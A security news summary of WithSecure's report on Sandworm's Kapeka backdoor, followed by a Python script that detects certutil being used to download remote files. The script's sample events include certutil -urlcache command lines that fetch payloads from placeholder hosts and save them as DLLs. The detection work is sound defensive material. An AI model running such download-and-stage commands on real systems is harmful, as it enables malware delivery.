Russian APT Deploys New ‘Kapeka’ Backdoor in Eastern European Attacks

April 17, 2024 at 10:04AM

WithSecure’s report reveals the discovery of the new Kapeka backdoor, linked to Russian APT group Sandworm, targeting Eastern Europe since 2022. Microsoft identifies it as KnuckleTouch, describing its involvement in ransomware campaigns and multifunctional capabilities. The backdoor’s advanced features indicate APT-level activity, showing conceptual overlaps with GreyEnergy and Prestige.

Key takeaways from the report:

– A previously undocumented backdoor called Kapeka has been observed in cyber attacks targeting Eastern Europe, specifically Estonia and Ukraine, since mid-2022. It is attributed to the Russia-linked advanced persistent threat (APT) group known as Sandworm.
– Kapeka is a flexible backdoor that serves as an early-stage toolkit for its operators and provides long-term access to the victim’s system. It includes a dropper designed to launch and execute the backdoor component on the infected host before removing itself, and it can set up persistence as a scheduled task or as an autorun registry entry.
– Microsoft has described Kapeka as involved in multiple campaigns distributing ransomware and capable of various functions, such as stealing credentials, conducting destructive attacks, and granting remote access to the device.
– The backdoor is a Windows DLL written in C++ with an embedded command-and-control (C2) configuration for establishing contact with an actor-controlled server.
– Kapeka masquerades as a Microsoft Word add-in, communicates with its C2 using the WinHttp 5.1 COM interface, and utilizes JSON to send and receive information from its C2.
– It is also capable of updating its C2 configuration on the fly, and its features include reading and writing files, launching payloads, executing shell commands, and even upgrading and uninstalling itself.
– The exact method of propagation is unknown, but the dropper is retrieved from compromised websites using the certutil utility, indicating the use of a legitimate living-off-the-land binary (LOLBin) to stage the attack.
– Kapeka has conceptual and configuration overlaps with previously disclosed families such as GreyEnergy and Prestige, and it is likely a successor to GreyEnergy, itself a successor to BlackEnergy, in Sandworm’s arsenal.
– The victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity likely of Russian origin.
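The certutil retrieval step above is one of the few observable stages of the intrusion, so it is a natural detection point. The following is an added example (not code from WithSecure or the report) that flags process-creation events in which certutil.exe is used to fetch a remote file; the sample events, URLs and paths are constructed, and the check assumes the widely documented `-urlcache` download syntax rather than whatever exact invocation the operators used.

```python
import re
import shlex

# Constructed sample process-creation records (not from the report). Fields mimic
# what an EDR or Sysmon Event ID 1 record provides: image, command line, parent.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://compromised.example/dl/x.bin C:\\Users\\Public\\x.dll",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",           # benign certificate check
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -f https://cdn.example.org/payload.txt %TEMP%\\update.dll",
     "parent": r"C:\Windows\System32\wscript.exe"},
]

URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_cmdline(cmdline):
    """Tokenise a Windows command line; non-POSIX mode keeps backslashes literal."""
    return shlex.split(cmdline, posix=False)


def certutil_download(event):
    """Return {url, target, parent} if the event is a certutil remote fetch, else None."""
    if not event["image"].lower().endswith("certutil.exe"):
        return None
    tokens = parse_cmdline(event["cmdline"])
    # certutil accepts both '-' and '/' switch prefixes; normalise for comparison.
    flags = {t.lower().lstrip("-/") for t in tokens if t.startswith(("-", "/"))}
    if "urlcache" not in flags:
        return None
    urls = [t for t in tokens if URL_RE.match(t)]
    if not urls:
        return None
    # With -f, the argument after the URL is the local output path (if given).
    idx = tokens.index(urls[0])
    target = tokens[idx + 1] if idx + 1 < len(tokens) else None
    return {"url": urls[0], "target": target, "parent": event["parent"]}


def scan(events):
    """Run the check over a batch of events and return only the hits."""
    return [hit for hit in (certutil_download(e) for e in events) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"certutil fetch: {hit['url']} -> {hit['target']} (parent {hit['parent']})")
```

In a real deployment the parent process and the written target path are what separate a LOLBin download from routine certificate maintenance, so both are returned for correlation with subsequent DLL loads or scheduled-task creation.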

